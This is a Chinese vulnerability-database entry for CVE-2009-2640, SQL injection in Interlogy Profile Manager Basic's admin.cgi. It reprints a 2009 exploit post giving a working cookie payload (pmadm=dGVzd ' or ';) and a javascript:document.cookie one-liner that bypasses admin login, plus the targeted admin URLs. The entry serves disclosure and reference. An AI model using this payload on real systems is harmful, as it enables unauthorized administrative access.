Interlogy Profile Manager Basic 脚本cgi/admin.cgi 多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117920 漏洞类型 SQL注入
发布时间 2009-06-08 更新时间 2009-06-08
CVE编号 CVE-2009-2640 CNNVD-ID CNNVD-200907-401
漏洞平台 CGI CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8895
https://www.securityfocus.com/bid/44438
https://cxsecurity.com/issue/WLB-2009070211
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200907-401
|漏洞详情
InterlogyProfileManagerBasic中的cgi/admin.cgi存在多个SQL注入漏洞允许远程攻击者借助(1)edittemp操作,(2)用户操作中的pmadmcookie执行任意的SQL指令。
|漏洞EXP
[~] interlogy Profile Manager Basic (for ByPass) Insecure Cookie Handling Vulnerability 
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 06/06/2009
[~]
[~] Home: yildirimordulari.com / z0rlu.blogspot.com 
[~]
[~] msn: trt-turk@hotmail.com
[~] 
[~] N0T: Kpss AnanI ....
[~] -----------------------------------------------------------

desc:

normal login for cookie

pmadm=dGVzdA;

if ý do this:

pmadm=dGVzd(write any thing);

example:

pmadm=dGVzdz;  

or

pmadm=dGVzd123231212313;

not login 

if ý do wthis:

pmadm=dGVzd ' or ';

boom this loggin :D

exp:

javascript:document.cookie = "pmadm=dGVzd ' or '; path=/";

after you go here:

http://demo.interlogy.com/pm3/cgi/admin.cgi?action=edittemp

or http://demo.interlogy.com/pm3/cgi/admin.cgi?action=users

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone & Stack & ThE g0bL!N & AlpHaNiX  and all friends
[~]
[~] yildirimordulari.com / z0rlu.blogspot.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-06-08]
|受影响的产品
Interlogy LLC Profile Manager Basic 0
|参考资料

来源:XF
名称:profilemanager-pmadm-security-bypass(50992)
链接:http://xforce.iss.net/xforce/xfdb/50992
来源:VUPEN
名称:ADV-2009-1529
链接:http://www.vupen.com/english/advisories/2009/1529
来源:MILW0RM
名称:8895
链接:http://www.milw0rm.com/exploits/8895